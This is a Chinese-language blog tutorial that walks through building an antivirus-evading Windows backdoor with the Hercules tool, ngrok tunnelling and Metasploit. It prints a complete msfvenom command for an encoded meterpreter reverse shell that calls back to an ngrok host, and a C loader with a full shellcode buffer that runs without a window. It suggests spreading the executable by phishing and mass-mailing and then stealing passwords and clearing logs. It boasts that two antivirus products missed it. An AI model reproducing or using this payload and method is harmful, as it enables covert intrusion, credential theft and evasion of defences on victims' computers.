网络安全 – Kali Linux反向端口连接&免杀

服务器

浏览数:296

2019-3-14

本篇文章适用学习,维护网络安全,做合法公民

介绍:之前使用 小七免杀工具包 来作免杀(有空我就上传到网盘),免杀就是对PE(.bat、.exe等)文件中出现的特征码进行替换修改,方法有等价替换指令,字符串修改大小写、互补等。

如今开源的东西比起手工来做,不仅免杀率高,速度快,功能多,而且会长期维护。下面我就介绍下 Hercules 工具:

一、安装 Kali Linux

需要安装虚拟机,运行下载的.iso(如果不用Kali,BT5也可以,Kali是BT系列的升级版)。

二、搭建GO语言环境

1、安装GO

解压到 /usr/local 目录下:

2、配置环境

让GO命令有效:

文件后追加 export PATH=$PATH:/usr/local/go/bin

再按 Esc ,保存退出。查看是否正确配置:

三、安装Hercules

1、安装升级

升级软件包:

2、运行并生成免杀载荷

选择(1),输入ip、端口号(用于反弹回连),之后依次输入y及要生成的文件名,很简单就不截图了。

文件生成后,在 在线查毒网站 检测下,显示很多杀毒软件都检测不到。

四、内网穿透

1、登录官网并添加隧道

Kali Linux 上访问 ngrok网站(使用花生壳做内网穿透也可以),注册登陆,然后点击隧道管理进入:

点击确认添加,这样隧道就创建完成:

2、运行客户端

进入Kali,下载运行 ngrok客户端 地址:https://www.ngrok.cc/#down-cl…,下载linux的版本

成功运行ngrok客户端后,内网穿透就弄好了,外网地址就是下图中的 server.nogrok.cc: 注册隧道的端口号

五、反向端口连接

使用MetaSpolit Framework简称Msf框架。

1、生成payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’    lhost=server.ngrok.cc lport=00000 -f c

-p 指定payload,–e 编码器,-i 编码次数(次数越多免杀几率越高),-b 去除坏字符,lhost 服务器(ngrok默认为server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建议生成c)

如果-f指定的是c,则将输出的buf[]复制出来:

2、VC6.0编译shellcode

这个就不贴图了,直接贴代码了

#include <stdio.h>
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // 运行时不显示窗口

unsigned char buf[] = 
"\xbb\xa1\x7d\x04\x59\xda\xca\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x9e\x31\x5d\x14\x03\x5d\x14\x83\xed\xfc\x43\x88\xba\x1e\xde"
"\x61\xa6\x7a\x33\x5c\x5c\x5f\x47\x07\xae\x56\x16\x2f\x53\xa8"
"\x5c\x61\x24\x38\x5f\xf1\xd5\xd8\xed\x77\x1f\xc2\xb5\x4f\x0b"
"\x05\xb8\x9c\x44\xf1\x31\x77\xdc\x47\x2f\xaf\xa7\xf5\x50\xa9"
"\xa3\x45\xb7\x52\x62\x52\x8e\xb9\x03\x5e\xcd\x1f\xb8\xec\xa8"
"\x64\x3e\x96\x16\x0d\x3e\x5d\x30\x53\xa7\xcf\xf0\xd0\xaa\x32"
"\xe5\x6b\x12\x74\x50\xcb\xdd\x12\x89\xde\x29\x03\xca\xcb\xb8"
"\x2c\xd8\xdf\x42\xf8\xa2\x42\xdd\xdc\x31\xe8\x15\xe9\x40\x87"
"\x3c\x4b\xf7\x79\x30\x7b\x33\xee\xcc\x46\xa6\x17\x39\x57\xec"
"\xf0\xcc\x6d\xe3\x17\xf5\xe8\x5c\xc4\xd4\xbb\x26\x8c\xc0\x0e"
"\xe3\xab\xc6\xad\x84\x0d\x25\x9c\x37\x30\xd0\x3c\x81\x9e\x29"
"\x8b\xb5\xec\xd2\xbf\x01\xf0\xc6\x0d\xde\xa8\x9b\xe5\x72\x88"
"\x00\x21\xd8\xac\x78\xb4\xe7\x70\x05\xda\xe3\xa9\xaf\xcf\x2c"
"\x04\x6a\xe7\x0d\x2c\xc3\xce\x3a\x48\x0f\x94\xac\xb9\xb8\xcb"
"\xa6\xdf\xed\xf8\x1d\x75\x4e\x16\x78\xb6\xe8\x0c\x07\x48\x84"
"\xce\x79\xd4\xa0\x68\x8f\xc5\xd4\xde\x31\x13\x27\x4e\xa7\xaf"
"\x51\x54\x8a\x12\x1a\xb7\x8a\x97\x60\x10\x48\x01\x6c\x39\x46"
"\x40\x07\x8d\xe1\x19\xf4\x65\x25\x87\xd5\x27\x8b\x11\x7f\xcb"
"\xd2\x30\x0f\x91\x2f\x30\x55\x1d\x7d\xef\xb0\x03\x98\x59\x0e"
"\x29\xc5\xbd\x6c\x8b\xe1\x84\x8f\xee\xc9\x22\xe9\x62\xf1\x06"
"\x19\xf1\xbe\xa5\x8c\x88\xed\xc2\x71\x70\x01\x59\x4c\x15\x5a"
"\xe4\xe8\x75\x3c\xdc\x96\xd5\x41\x70\xe3\x60\x7d\x45\x29\x56"
"\xd2\xf4\x73\xb5\x06\xc7\xba\x53\x22\xdd\xbd\x5d\x89\x91\xe6"
"\x72\xfc\x75\x37\xbc\xed\xbb\x16\x05\x01\x56\x3a\x32\x72\x69"
"\x93\xec\xa4\x7b\x33\xff\xd7\x92\x7d\x1c\xef\xd7\x75\x7d\x45"
"\x5f\x67\x47\x2b\x90\x9b\x6e\x82\xb4\x17\xcd\x3b\x45\x8b\x4d"
"\x45\x50\x71\xeb\xb9\x49\x42\x64\xd7\x0c\x67\x61\xee\x21\x6e"
"\x78\x7e\x32\x26\xe7\x65\x10\x9d\x69\x46\x21\x2f\x97\x3c\x3d"
"\xbe\xd7\x06\x2f\x5b\x81\xae\xe9\x22\x6d\xdc\x6d\x2f\x64\xfb"
"\xc1\xe1\xae\xf6\xc6\x0a\x73\x52\x10\x7c\xb0\x3f\xf2\x60\x69"
"\xaf\x05\x6a\xa6\x2a\x53\xec\xb8\x73\xdd\xd3\x2c\x82\xab\x64"
"\x97\xf3\xdb\xe8\x2f\x22\x50\xde\xf4\x2e\x97\x8a\x79\xf4\xdc"
"\x92\x37\x45\x23\x86\x63\x42\x5e\x98\xc2\x49\xc3\x1d\x34\x1d"
"\xac\x24\x76\xef\xd7\x69\x8d\xd2\x2c\x40\x1c\xa2\x36\x29\x6c"
"\xa5\x25\x01\xd7\xbd\x7c\x15\x54\x07\xaa\x2c\x5a\xeb\x53\x6d"
"\x3b\x3a\x45\x50\x6d\x4f\x96\xb3\xf9\xdb\x96\x29\x0d\x6a\xa9"
"\x58\x9f\xf0\x14\xc3\x79\x0c\x99\x3c\x58\xc0\x61\xb6\xca\x5d"
"\x61\x9f\xf9\x65\x99\xb4\x91\xac\x5d\x7c\xf5\x9c\x99\xe5\x60"
"\x99\xc9\x8d\xcb\xe7\xd4\xc3\x5c\xd6\x39\xd4\xe0\x71\x73\xa2"
"\x24\xdd\x3c\xb4\x82\xda\x2c\xaf\xa5\x1e\x48\xa7\xf5\x89\x4d"
"\xb6\x10\x74\xe5\x06\xf2\x5b\xfa\x3c\x58\x84\xc6\x68\x16\x8b"
"\x26\x7a\x2f\x2a\x0c\x40\xf8\x61\x8b\x49\x14\x27\xf7\xe5\x4f"
"\x9a\xe3\x47\xb7\x1a\x13\xe9\x16\x06\x84\xab\x70";

main() {
    ((void(*)(void))&buf)();
}

编译.cpp,生成.exe。

接下来我们还要配置Msf反向端口监听。

3、Msf配置监听

Msf前先运行psql(新版Msf加入了psql的支持):

配置Msf利用:

这时我们就大功告成了,只需等待客户端运行我们的.exe(钓鱼挂马群发等方式散播)

4、测试

运行.exe,Msf显示已经回连,之后的操作就跟windows一样了,读取对方密码、目录、清log等等。。。

经过运行,360、腾讯杀毒软件没有检测出来问题。。。